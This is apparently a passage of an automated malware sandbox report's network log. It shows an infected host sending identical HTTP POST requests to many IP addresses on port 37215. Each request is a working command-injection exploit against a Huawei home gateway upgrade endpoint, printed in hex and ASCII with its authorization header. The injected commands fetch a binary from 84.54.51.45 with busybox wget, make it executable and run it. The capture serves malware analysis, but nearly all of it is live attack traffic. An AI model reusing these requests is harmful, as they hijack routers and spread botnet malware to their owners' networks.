68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            914192.168.2.153725441.70.161.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745101929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            915192.168.2.154925841.158.212.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745129108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            916192.168.2.155968241.10.162.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745151997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            917192.168.2.155517841.204.158.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745176077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            918192.168.2.155665041.253.108.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745203972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            919192.168.2.154764041.161.185.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745233059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            920192.168.2.156001041.232.176.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745259047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            921192.168.2.154132841.213.148.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745284081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            922192.168.2.154095041.176.239.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745336056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            923192.168.2.155155041.255.227.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745343924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            924192.168.2.154025641.11.96.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745404959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
